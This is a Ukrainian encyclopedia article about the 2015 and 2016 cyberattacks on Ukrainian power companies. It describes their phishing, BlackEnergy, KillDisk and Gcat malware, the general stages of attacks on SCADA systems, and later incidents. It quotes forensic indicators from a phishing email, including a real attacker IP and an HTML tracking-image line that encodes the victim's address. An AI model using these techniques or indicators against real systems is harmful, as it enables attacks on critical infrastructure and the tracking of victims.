-
Кібератака на енергетичні компанії України
Кібератака на енергетичні компанії України — перша зареєстрована успішна кібератака на енергетичну систему з виведенням її із ладу. Сталась 23 грудня 2015 року.
Сутність
Російським зловмисникам вдалось успішно атакувати комп'ютерні системи управління трьох енергопостачальних компаній України. Наступна, і набагато менш масштабна за наслідками, кібератака сталась вночі з 17 на 18 грудня 2016 року. Протягом трохи більше однієї години була виведена з ладу підстанція «Північна» енергокомпанії «Укренерго», без струму залишились споживачі північної частини правого берегу Києва та прилеглих районів області[1].
Найбільше від першої кібератаки постраждали споживачі «Прикарпаттяобленерго»: було вимкнено близько 30 підстанцій, близько 230 тисяч мешканців залишались без світла протягом однієї-шести годин. Атака відбувалась із використанням троянської програми BlackEnergy[2].
Водночас синхронних атак зазнали «Чернівціобленерго» та «Київобленерго», але з меншими наслідками. За інформацією одного з обленерго, підключення зловмисників до його інформаційних мереж відбувалося з підмереж глобальної мережі Internet, що належать провайдерам в Російській Федерації[3].
Загалом кібератака мала комплексний характер та складалась щонайменше з таких складових:[3]
- попереднє зараження мереж за допомогою підроблених листів електронної пошти з використанням методів соціальної інженерії;
- захоплення управління АСДУ з виконанням операцій вимикань на підстанціях;
- виведення з ладу елементів ІТ інфраструктури (джерела безперебійного живлення, модеми, RTU, комутатори);
- знищення інформації на серверах та робочих станціях (утилітою KillDisk);
- атака на телефонні номери кол-центрів, з метою відмови в обслуговуванні знеструмлених абонентів.
Перерва в електропостачанні склала від 1 до 3,5 годин. Загальний недовідпуск — 73 МВт·год (0.015 % від добового обсягу споживання України)[3].
Внаслідок другої кібератаки, в грудні 2016 року, струм був відсутній протягом трохи більше однієї години[1].
Передісторія
Інформаційні системи, відповідальні за управління роботою об'єктів інфраструктури відносять до класу автоматизованих систем керування технологічним процесом (скорочено АСК ТП; або Шаблон:Lang-en, ICS). Усі АСК ТП ділять на три класи: системи диспетчерського управління і збирання даних (SCADA), розподілені системи керування (РСК), програмовані логічні контролери (ПЛК)[4].
Або загальних рисах, електрична мережа є об'єктом інфраструктури, який сполучає споживачів електричної енергії з її виробниками[5]. У будь-якому процесі управління існує об'єкт, яким управляють (вимикач, трансформатор, генератор) і орган, який здійснює управління (технічний засіб, людина). У процесі управління цей орган отримує інформацію про стан зовнішнього середовища, де перебуває об'єкт і з яким він пов'язаний. Уся ця інформація сприймається управляючим органом, який виробляє на її основі управляючу інформацію (приймає рішення). На основі прийнятого рішення виконавчий орган здійснює управляючий вплив на об'єкт управління[6]. При цьому оператор засобами людино-машинної взаємодії може впливати на параметри роботи АСУ ТП, керувати об'єктом управління, здійснювати діагностику, переглядати за поточним станом системи та виправляти виявлені несправності[4].
Складні інформаційні системи управління роблять системи автоматизації електричними мережами вразливими перед кібератаками. В праці[7] дослідники виокремили три категорії можливих кібератак:
- націлені на компоненти: електронно-обчислювальні прилади, такі як віддалені термінали (RTU) або людино-машинного інтерфейсу (HMI) зазвичай мають інтерфейс для віддаленого налаштування або управління. Через віддалений доступ зловмисник може перехопити управління пристроєм та спричинити несправності, наприклад:
- спотворити передані дані оператору;
- пошкодити обладнання, якщо оператор здійснює управління на основі спотворених даних;
- взагалі повне або часткове виведення пристрою з ладу.
- націлені на протоколи: майже всі сучасні протоколи передачі даних добре задокументовані та їхнє описання знаходиться у відкритому доступі. Наприклад, стандарт DNP3 поширений в системах управління електричними мережами у Північній Америці. Його специфікація доступна всім охочім за невелику ціну. Документація протоколу полегшує завдання зворотної розробки для здійснення атаки типу «людина посередині». Серед іншого, зловмисник може відправляти спотворені дані, які можуть призвести до:
- фінансові втрати через перевиробництво елеткричної енергії;
- небезпека для працівників: наприклад, зловмисник може увімкнути живлення ЛЕП коли там працюють інженери;
- пошкодження обладнання, якщо внаслідок відправлених команд станеться перенавантаження окремих ланок системи.
- націлені на топологію: зловмисники можуть скористатись також і вразливостями топології мережі. Наприклад, масована відправка коректних запитів на віддалені термінали може створити затримки у відправленні повідомлень в режимі реального часу. Це призведе до спотвореного представлення стану системи оператору, через що він може ухвалювати помилкові рішення[7].
Так само, як під час звичайної війни, об'єкти інфраструктури є мішенями атак і під час кібервійни[4].
Станом на 2016 рік вже були відомі успішні віддалені кібератаки на об'єкти інфраструктури. Наприклад, в 2000 році розлючений інженер Вайтек Боуден вирішив провчити своє керівництво і здійснив успішну кібератаку на очисні споруди в графстві Маручі (Квінсленд, Австралія). Внаслідок атаки до навколишнього середовища потрапило понад 800 тис. літрів неочищених стічних вод, природа та живі істоти зазнали істотної шкоди[4].
Приклад типової атаки
Доступ
Для здійснення атаки на системи промислового управління зловмисник спочатку має отримати до них доступ. В праці[7] названо три поширених шляхи отримання несанкційованого доступу[5]:
- атака на шлюз між корпоративною мережею та мережею SCADA;
- атака на зовнішні канали доступу до мережі SCADA через VPN;
- зв'язок зі сторонніми серверами.
Для нормальної роботи систем управління необхідний певний обмін інформацією . Зазвичай, інформація зі SCADA потрапляє до тих чи інших баз даних, і долає деякий мережевий шлюз між комерційною та промисловою підмережами. Шлях для обміну інформацією може бути вразливим до атак[7].
Також системи SCADA можуть обмінюватись інформацією з терміналами операторів. Злам операторського терміналу також може бути використаний зловмисником для проникнення до мережі SCADA[7].
Вразливим до атак може бути і віддалений доступ операторів або інших інженерів до систем SCADA через VPN, особливо у випадку невірного налаштування[7].
Вразливість можуть становити сторонні сервери (архівування даних, розробників, аналітиків, тощо) та їхнє підключення до системи промислового управління[7].
Розвідка
Після здобуття доступу до мережі промислового управління, зловмисник має здійснити розвідку, аби вивчити схему роботи SCADA. Інколи, надзвичайна складність систем SCADA посилює захист від атаки та примушує зловмисника витрачати час та сили на її вивчення[7].
Одразу після вторгнення зловмисник, швидше за все, матиме дуже обмежений доступ до решти мережі.
Серед доступних йому джерел інформації можуть бути внутрішні вебсервери, робочі станції операторів, мережеві диски, інші інтерфейси до керованих систем. Ці джерела інформації можуть бути доступними всім терміналам у мережі, інколи навіть без автентифікації користувача[7].
Іншим джерелом інформації може стати пасивна розвідка комп'ютерної мережі. Успіх цього методи істотно залежить від знаходження зкомпрометованої системи в мережі та вимагає від операторів виконувати якісь дії (аби генерувати потоки даних). На відміну від попереднього підходу, може надати інформацію про облікові дані користувачів, використані ними протоколи, налаштування, тощо. Також пасивна розвідка мережі не потребує відправки пакетів даних і тому непомітна системам виявлення вторгнень. Якщо зкомпрометована система знаходиться в одній мережі з основними складовими SCADA, зловмисник матиме можливість розвідки використаних протоколів та команд[7].
Зловмисник може вдатись і до активної розвідки мережі. Для цього йому знадобиться доступ до зкомпрометованої системи з правами адміністратора, оскільки цей метод передбачає можливість відправляти мережею спеціально сформовані пакети даних. Однак, ці пакети можуть бути помічені системою виявлення вторгнень, внаслідок чого системні адміністратори дізнаються про існування в мережі зкомпрометованої системи. На противагу попереднім методам, цей метод дозволяє зловмисникові дізнатись про доступні зі зкомпрометованої системи пристрої та інші термінали в мережі[7].
Нарешті, для розуміння та відтворення промислового процесу зловмисникові доведеться ретельно вивчити отриману ним інформацію. Наприклад, із перехоплених повідомлень він може дізнатись про існування терміналу «Вимикач-4А», але йому доведеться докласти додаткових зусиль аби збагнути, що це за вимикач, та як він впливає на систему в цілому[7].
Перехоплення управління
Після вивчення промислового процесу, зловмисник може перейти до перехоплення управління ним. Різні методи можуть надавати різний рівень контролю, а відповідно, і результати атаки[7].
Серед найважливіших об'єктів для атаки є головний диспетчерський блок (Шаблон:Lang-en, FEP), який відповідає за взаємодію між програмованими логічними контролерами та іншими компонентами системи SCADA, зокрема, з людино-машинним інтерфейсом з оператором[7].
Іще однією важливою мішенню для зловмисника може бути людино-машинний інтерфейс (HMI), оскільки він доступно представляє стан всієї системи та надає можливість оператору керувати нею. Однак, можливості для атаки будуть обмежені можливостями людино-машинного інтерфейсу і тому зловмисникові може не вдатись вивести систему з ладу або завдати якоїсь істотнішої шкоди[7].
Атака на людино-машинний інтерфейс є атакою націленою на компоненту. З її переваг можна назвати те, що вона може бути здійснена із використанням звичайних підходів та інструментів, не пов'язаних з промисловими системами управління. Також атака на людино-машинний інтерфейс дозволить зловмисникові приховати свою діяльність під виглядом звичайної роботи оператора[7].
Схожою на атаку на людино-машинний інтерфейс може бути атака на робочі станції інженерів (Шаблон:Lang-en, EWS), залучених в розробці програмного забезпечення для людино-машинного інтерфейсу та іншого системного ПЗ. Перевага атаки на робочі станції полягає в тому, що вони можуть не мати обмежень, які накладає людино-машинний інтерфейс[7].
Зловмисник, після вивчення протоколу між людино-машинним інтерфейсом і контролерами, може здійснити спуфінгову атаку — відправляти підроблені команди контролерам або спотворювати дані, передані оператору[7].
Програмовані логічні контролери, особливо під'єднані до мережі, можуть бути іще одним об'єктом атаки. Інколи програмовані контролери доступні через вебслужби, модеми, протокол Telnet. Погано захищений контролер може видати зловмиснику не лише інформацію про свій стан, а й навіть про запрограмовану логіку та вбудовану програму[7].
Перша хвиля
«Прикарпаттяобленерго»
Нападники змогли отримати доступ до корпоративної мережі компанії завдяки вдалому зараженню комп'ютера одного із співробітників трояном BlackEnergy третьої версії. Проте, мережі цифрових контролерів, які власне і керують обладнанням, знаходились за мережевими екранами.
Протягом багатьох місяців вони проводили масштабну розвідку, досліджували та описували мережі і здобували доступ до служби Windows Domain Controllers, яка керує обліковими записами користувачів мереж. Тут вони зібрали реквізити співробітників, у тому числі паролі від захищеної мережі VPN, яку працівники енергокомпаній використовували для віддаленого підключення до мережі SCADA.
Здобувши доступ до внутрішньої мережі нападники переконфігурували пристрої безперебійного живлення (UPS), відповідальні за енергопостачання двох диспетчерських центрів.
Кожне обленерго використовувало власну систему управління розподілом енергії у своїх мережах, і під час фази розвідки нападники ретельно вивчили кожну з них. Тоді вони написали шкідливий мікрокод, яким замінили справжній вбудований мікрокод на конвертерах із серійного інтерфейсу на інтерфейс Ethernet у понад десяти підстанціях (ці конвертери застосовуються для обробки команд, які надходять від мережі SCADA до систем управління підстанцією).
Виведення з ладу конвертерів не давало операторам змогу посилати віддалені команди для повторного включення запобіжників після того, як енергію було вимкнено.
Приблизно о 3:30 по обіді 23 грудня вони зайшли в мережі SCADA через вкрадені облікові записи і віддали команди на вимкнення систем безперебійного живлення, які вони вже переконфігурували раніше. Після цього вони почали вимикати запобіжні системи, які переривали живлення.
Але перед цим вони запустили атаку за методикою «відмова від обслуговування» на кол-центри обленерго, аби користувачі не могли повідомити про аварію. Фіктивні дзвінки, судячи з усього, надходили з Москви.
Після того, як нападники вимкнули запобіжники і відключили низку підстанцій від мережі, вони також переписали програмний мікрокод на конвертерах із серійного інтерфейсу на інтерфейс Ethernet, замінивши «справжнє» програмне забезпечення шкідливим, і тим самим вивівши з ладу конвертери, які перестали виконувати команди.
Завершивши всі ці дії, зловмисники застосували програму під назвою KillDisk для знищення файлів з комп'ютерів операторів підстанцій, тим самим вивівши і їх з ладу. KillDisk стирає чи перезаписує дані в критично важливих системних файлах, викликаючи їхнє «зависання».
Деякі з компонентів KillDisk потрібно запускати вручну, але нападники у двох випадках застосували так звану «логічну бомбу», яка запустила KillDisk автоматично через 90 хвилин після початку атаки.
Через півгодини, коли KillDisk мав зробити свою справу і в операторів не залишилось сумнівів щодо причини масштабного зникнення світла, компанія розмістила друге повідомлення — про те, що до цього причетні хакери.
«Київобленерго»
Одночасно з атаками на західноукраїнські обленерго, хакери завдали потужного удару по комп'ютерних мережах «Київобленерго»: 23 грудня 2015 року сторонніми особами було здійснено несанкційоване втручання в інформаційно-технологічну систему віддаленого доступу до телеуправління обладнанням підстанцій 35-110 кВ ПАТ «Київобленерго»[8]
В результаті втручання виникли збої в роботі телемеханіки та було відключено 30 вузлових підстанцій (7 — ПС-110 кВ та 23 — ПС-35 кВ) від яких живиться низка стратегічних об'єктів області: підприємства, державні установи, заклади та населення. З 15:31 хв. до 16:30 хв. було повністю або частково відключено близько п'ятдесяти населених пунктів у Білоцерківському, Кагарлицькому, Миронівському, Фастівському, Сквирському, Макарівському, Рокитнянському, Іванківському та Яготинському адміністративних районах, без електричної енергії були понад 80 378 споживачів. Електропостачання було відновлено всім споживачам о 18:56 того ж дня[8].
Друга хвиля
Невстановлені зловмисники здійснили наприкінці лютого 2016 року другу хвилю кібератак на компанії енергетичного сектора України: 19 та 20 лютого ними було розіслано близько 100 отримувачам «вірусні» листи електронною поштою[9].
Перший етап «вірусної розсилки» розпочався надвечір 19 лютого 2016, другий етап розпочався зранку, до початку робочого дня 20 лютого (вівторок та середа відповідно). Тоді НЕК «Укренерго», довідавшись про масову розсилку листів начебто від її імені виступила із заявою на офіційному вебсайті[9].
Як і в попередній хвилі (грудень 2015 року), зловмисники скористались поширеним прийомом соціальної інженерії: електронний лист мав вкладений документ-приманку, при перегляді якого жертві пропнується активувати макрос для коректнішого зображення вмісту[9].
Після відкриття документа на комп'ютері жертви створюється і запускається завантажувач, завданням якого є завантаження, декодування, та запуск шкідливої програми (файл: «root.cert»). У випадку цієї атаки шкідлива програма — бекдор був завантажений із зламаного іще в середині серпня 2015 року сервера, який фізично знаходився в Україні:[9]
На цьому етапі можна виокремити дві риси подібні до попередньої хвилі атак із застосуванням BlackEnergy:[9]
- Для відправлення електронного листа зі шкідливим вкладенням «Ocenka.xls» був використаний відомий сервер:
- Received: from mx2-mail.com (mx1-mail.com [5.149.248.67])
- Електронний лист, як і в першій хвилі, містив в тілі рядок (гіперпосилання на файл), назва якого містила закодовану в base64 адресу електронної пошти жертви:
<DIV><IMG border=3D0 hspace=3D0 alt=3D""=20 src=3D"http://62.210.83.213/bWFpbF92aWN0aW1Ac29tZS5nb3YudWE=3D=.png"></DIV>
- Наприклад, в рядку "bWFpbF92aWN0aW1Ac29tZS5nb3YudWE=" закодована адреса <mail_victim@some.gov.ua>.
На відміну від попередньої хвилі, цього разу як бекдор була використана програма з відкритими кодами Gcat, а не потужніший та гнучкіший BlackEnergy. Програма Gcat написана мовою програмування Python та перетворена на .EXE файл програмою PyInstaller[10], як канал керування використана служба електронної пошти Gmail. Попри простоту цієї програми (в порівнянні з BlackEnergy версій 2 та 3), вона має низку переваг, одна з яких — ускладнення її виявлення методом глибокого інспектування пакетів (DPI) каналу керування бекдором в інформаційних потоках (оскільки він нічим не відрізняється від звичайного використання поштової служби Gmail)[9].
Оскільки зловмисники залишили в обфускованому коді бекдору дані облікового запису каналу керування, стало можливим дослідити управління інфікованою системою з точки зору зловмисника. З проведеного дослідження випливало, що зловмисник здійснював атаку цілєспрямовано, скеровано на конкретну, вибрану ним жертву[9].
Завдяки вчасній реакції служб захисту інформаційних систем CyS-CERT та втручання CERT-UA була встановлена адреса сервера керування, задіяного в атаці, 20 лютого о 10:51 інтернет-провайдер Dream Line закрив до нього доступ[10]. Цим були припинені подальші спроби завантаження бекдору. До роботи із збереження електронних доказів, збирання даних для ідентифікації причетних до атаки осіб, були залучені співробітники СБУ[9].
В результаті додаткового розслідування було встановлено, що після першої розсилки надвечір 19 лютого щонайменше два співробітника із двох компаній відкрили документ-приманку, запустили макрос, в результаті чого був успішно завантажений бекдор, але завантажені бекдори встановитись не змогли[9].
20 лютого 2016 року, вже після першої та другої розсилок, був для зловмисників успішнішим днем. В проміжок між 08:42 та 10:39 бекдор був завантажений 9 співробітниками із 4 компаній. Однак, успішне встановлення бекдору з відкриттям каналу керування сталась лише на одному комп'ютері однієї компанії. При цьому зловмисники почали скеровану розвідку комп'ютерної мережі жертви, що може свідчити про те, що зловмисники були обізнані про сткрутуру інформаційної системи компанії та були причетні до атак в грудні 2015 року[9].
Кібератака 17-18 грудня 2016 року
У вечорі та вночі з суботи на неділю, 17 на 18 грудня 2016 року на підстанції «Північна» стався збій в автоматиці управління, через що споживачі північної частини правого берегу Києва та прилеглих районів області залишились без струму. Несправності були усунуті протягом 1 години 15 хвилин. Основною версією стала кібератака — зовнішнє втручання через мережі передачі даних[11]. Оператор підстанції, компанія «Укренерго» спочатку не стала підтверджувати кібератаку, проте залучені до розслідування фахівці з комп'ютерної безпеки підтвердили, що збій стався внаслідок кібератаки. Проміжні результати розслідування були представлені фахівцями Олексієм Ясінським від компанії Information Systems Security Partners (Україна) та Мариною Кротофіл від Honeywell Industrial Cyber Security Lab 10 січня 2017 року на конференції S4 у Флориді, США. Однак, нападники не стали завдавати істотної шкоди, натомість дана атака мала послужити «демонстрацією сили». Як і у попередніх випадках, дана атака була частиною масштабнішої фішингової операції проти державних установ України[1].
На початку червня 2017 року були оприлюднені доповіді фахівців компаній ESET та Dragos, в яких було наведено результати ретельного аналізу шкідливого ПЗ, використаного в атаці. Дане ПЗ отримало назву Industroyer або Crash Override.[12][13]
Інші кібератаки на енергетичні системи
Кібератаки на електростанції, диспетчерські, та енергетичну інфраструктуру траплялись як до, так і після кібератаки на «Прикарпаттяобленерго», зокрема:
- Восени 2012 року три зразки шкідливого ПЗ були виявлені на комп'ютерах енергетичної компанії в США. Шкідливе ПЗ потрапило до інформаційної системи на USB-носії, який один з інженерів використовував для архівування налаштувань системи управління. Слід зазначити, що вражені системи не мали резервних механізмів, тому видалення вірусів потребувало надзвичайної уваги[14][15].
- Навесні 2016 року комп'ютерні віруси «W32.Ramnit» та «Conficker» були виявлені в інформаційній системі, яка виконує візуалізацію пересування стрижнів із ядерним паливом, а також в офісній мережі атомної електростанції Gundremmingen, що знаходиться за 120 км на північний захід від Мюнхена. За твердженнями оператора, цей інцидент не становив загрози для безпеки станції[16].
Примітки
Література
- Загальна
- Шаблон:Cite journal
- книжка окрім описання Stuxnet та подій навколо його застосування, виявлення, дослідження, містить широкий огляд відомих кібератак на промислові АСУ ТП та об'єкти критичної інфраструктури
Див. також
- Кібератака на Укренерго (грудень 2016 року)
- Російсько-українська кібервійна
- Розвинена стала загроза
- Електроенергетика України
- Duqu
- Удари по критичній інфраструктурі України під час російсько-української війни
Посилання
- Кім Зеттер, Хакерська атака Росії на українську енергосистему: як це було . Тексти
- ICS-CERT, Cyber-Attack Against Ukrainian Critical Infrastructure (IR-ALERT-H-16-056-01)
- Прикарпаттяобленерго, Прикарпатські енергетики оговтуються після кібератаки
- Німецька Хвиля, Американські експерти: «Прикарпаттяобленерго» атакували російські хакери
- Кібератака 17-18 грудня 2016 року
- Виступ Marina Krotofil та Oleksii Yasynskyi на конференції S4 Events, Шаблон:Youtube (15 лютого 2017 року)
- ↑ 1,0 1,1 1,2
https://motherboard.vice.com/read/ukrainian-power-station-hacking-december-2016-report
- ↑
http://texty.org.ua/pg/article/newsmaker/read/66125/Hakerska_ataka_Rosiji_na_ukrajinsku_jenergosystemu_jak
- ↑ 3,0 3,1 3,2
http://mpe.kmu.gov.ua/minugol/control/uk/publish/article?art_id=245086886&cat_id=35109
- ↑ 4,0 4,1 4,2 4,3 Шаблон:Cite book
- ↑ 5,0 5,1 Шаблон:Cite book
- ↑ http://www.d-learn.pu.if.ua/data/users/9645/Lecture1_ISU.pdf Лекція 1. Загальна характеристика автоматизованих систем управління
- ↑ 7,00 7,01 7,02 7,03 7,04 7,05 7,06 7,07 7,08 7,09 7,10 7,11 7,12 7,13 7,14 7,15 7,16 7,17 7,18 Шаблон:Cite journal
- ↑ 8,0 8,1
http://glavcom.ua/publications/334262-kibervijna-proti-ukrajini.-pershi-zhertvi-i-visnovki.html
- ↑ 9,0 9,1 9,2 9,3 9,4 9,5 9,6 9,7 9,8 9,9
https://cys-centrum.com/ru/news/attack_on_energy_facilities_jan_ps
- ↑ 10,0 10,1
http://www.welivesecurity.com/2016/01/20/new-wave-attacks-ukrainian-power-industry/
- ↑
http://itc.ua/news/osnovnoy-versiey-nedavnego-otklyucheniya-elektrichestva-v-kieve-nazvana-kiberataka-hakerov/
- ↑
https://www.wired.com/story/crash-override-malware
- ↑
http://www.epravda.com.ua/publications/2017/06/15/626036/
- ↑
https://ics-cert.us-cert.gov/monitors/ICS-MM201212
- ↑
http://www.esecurityplanet.com/malware/ics-cert-two-u.s.-power-plants-infected-with-malware.html
- ↑
http://www.reuters.com/article/us-nuclearpower-cyber-germany-idUSKCN0XN2OS